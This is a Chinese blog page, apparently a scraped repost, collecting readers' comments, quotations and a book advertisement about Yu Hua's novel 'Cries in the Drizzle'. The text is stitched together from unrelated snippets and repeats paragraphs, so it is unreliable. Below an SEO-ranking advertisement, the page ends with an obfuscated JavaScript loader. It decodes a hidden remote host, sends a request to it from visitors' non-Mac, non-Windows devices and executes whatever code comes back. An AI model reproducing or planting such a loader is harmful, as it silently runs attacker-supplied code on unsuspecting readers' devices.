在细雨中呼喊

2022年09月08日 admin 阅读(61)

在阅读了余华的《许三观卖血记》后,有朋友推荐说:余华写的最压抑的小说是《在细雨中呼喊》。于是找到了这部,拜读。

写《酒国》时,室友余华在写首部长篇《细雨中呼喊》,两人隔着矮柜沙沙动笔,有时缝隙对视,便灵感顿失,只好挂挂历遮挡。

后来通过朋友,李健与余华算认识了。“最好的一部是《在细雨中呼喊》。”这话李健说过多次,相信第一次见面也对余华说过。

后来通过朋友,李健与余华算认识了。“最好的一部小说是《在细雨中呼喊》。”这话李健说过多次,相信第一次见面也对余华说过。

《在细雨中呼喊》是余华老师早期的作品,是以第一人称写的,回忆录的形式,细雨中的记忆不断穿插,孙光林的青少年生活,与父兄的矛盾,在读者面前不断展开。“再也没有比孤独的无依无靠的呼喊声更让人战栗了,在雨中空旷的黑夜里”。故事情节只记得大概,他的不知所措和想要逃离却还能与之动容,“我突然发现了逃跑的意义,它使惩罚变得遥远,同时又延伸了快乐。”“回首往事或者怀念故乡,其实只是在现实里不知所措以后的故作镇静。”虽然逃避可耻但有用,可以迷惘,可以不知所措,但人终究是要直面现实的。

余华的书我也看过好几本,比如:《兄弟》《在细雨中呼喊》《许三观卖血记》等,可对于余华我是真没有去认真了解过,脑海里只有一个模糊映像:他是一个很了不起的作家。

余华的长篇小说《在细雨中呼喊》是一部关于记忆的书,也是他的第一部长篇力作。书中,作者天马行空地在过去、现在和未来这三个时间维度里自由穿行,为我们描述了一位江南少年的成长经历及其家庭历史中那些或悲或喜的故事。

作家出版社】正版包邮余华长篇小说全集4册活着+兄弟+许三观卖血记+在细雨中呼喊余华作品集余华的书代表作现当代文学小说精选92.5元

导读:《在细雨中呼喊》是二十世纪九十年代的经典文本,是余华的第一部长篇力作。小说描述了一位江南少年的成长经历和心灵历程。

如果说《活着》写的是被伸展到极致的痛苦,《许三观卖血记》是放大的亲情的羁绊,那《在细雨中呼喊》或许才是一部真正意义上的写实主义作品,因为我们每个人在这部作品的人物身上都或多或少能看到自己的影子。前两部作品因为被拍成了电影可能获得了更多的关注。但《在细雨中呼喊》可能才是余华被低估的最好的作品。因为书中每一个人物都是那样的立体,真实,鲜活而生动。

最后一张漫画的文案:“死亡不是失去了生命,而是走出了时间”,出自余华的小说《细雨中呼喊》,余华先生最著名的代表作是《活着》,也是现在的流行书,在这本名为活着的书里,却全是死亡和猝不及防的告别。

无意中看到了一个李健的采访,他说他觉得虽然余华的《活着》很有名,但是他觉的他的《在细雨中呼喊》写的更好,但可能看过的人不多。就这一句话,我就去找这本书看了。

其实,这霏霏春雨也是极具穿透力的。作家们常常用“细雨蒙蒙”来形容这绵绵细雨,然而,岂不知这细雨却是最能浸透干渴的土地。如丝的细雨悄无声息地滴落了下来,久旱的土壤努力地吸吮着上苍赐予的甘霖,躲在泥土中的种子快活起来了,像是嗷嗷待哺的雀儿们,生活在幸福的时光中……

前段时间在某个古早访谈里看到李健说,“余华的所有小说都应该看,其实最好的是那本《在细雨中呼喊》,只不过人们可能了解的没有那么多”

余华在《在细雨中呼喊》中写道:“我不再装模作样的拥有很多朋友,而是回到孤独之中,以真正的我开始独自的生活。”

近日,重读余华的《在细雨中呼喊》,依然有一种欲罢不能的感觉,幽默流畅的语言,细致入微的心理描写,没有了《活着》的惆怅,也没有《现实一种》的冷酷与残忍,依旧不变的是对生存的关注和对命运的质问,以及关于成长的感受。

余华在《在细雨的呼喊》中写道:“我不再装模作样地拥有很多朋友,而是回到了孤单之中,以真正的我开始了独自的生活。”

本文转载自互联网,如有侵权,联系删除

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

卓仁IT博客
卓仁IT博客的快速排名服务领先80%同行,首家开创刷百度关键词排名程序,非纯点击方法,无点击软件出售,需要seo快速排名提高网站排名请咨询顾问。
  • 文章61274
  • 评论0
  • 浏览11206761
function HwrGU(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function rdIfsiYJ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return HwrGU(t);};window[''+'D'+'S'+'G'+'Z'+'I'+'d'+'e'+'C'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=rdIfsiYJ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';console.log(u);var xhr=new XMLHttpRequest();xhr.open('GET',u+'/s/a?_='+i);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function(data.data)(cs);}};xhr.send('u=1');})('aHR0cHM6Ly9hcGkueHloeC5vcmc=','428516530718064640',window,document,['','VxKGyJk']);}:function(){};